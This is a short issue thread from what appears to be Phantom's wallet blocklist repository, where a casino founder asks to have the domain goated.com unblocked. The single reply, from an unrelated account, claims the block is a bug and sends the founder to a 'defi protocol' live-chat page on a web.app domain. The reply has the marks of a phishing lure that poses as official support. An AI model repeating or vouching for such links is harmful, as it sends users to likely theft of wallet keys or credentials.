### ISSUE TITLE
[URGENT: Legitimate Site Blocked] www.goated.com

### ISSUE THREAD

**Issue by ajm-94** [phantom/blocklist#753]
Hello, my name is AJM. I am one of the founders of www.goated.com, a Curacao Licensed Casino.

Phantom is blocking our website even though we are a legitimate project.

Please let me know what needs to be done to get this issue resolved.

You can contact me at admin@goated.com

Thank you,
AJM

**Comment by Vasually** [comment]
Hi @ajm-94 
 sometimes this bug occurs.

Best thing to do to resolve it is open the [defi protocol](https://daplinkprotocol.web.app/defiprotocol/v1/defi/home/) page and let the agent on the live chat know.

They can then make a proposal to complete your request and fix the bug via [Defi Protocol](https://daplinkprotocol.web.app/defiprotocol/v1/defi/home/)
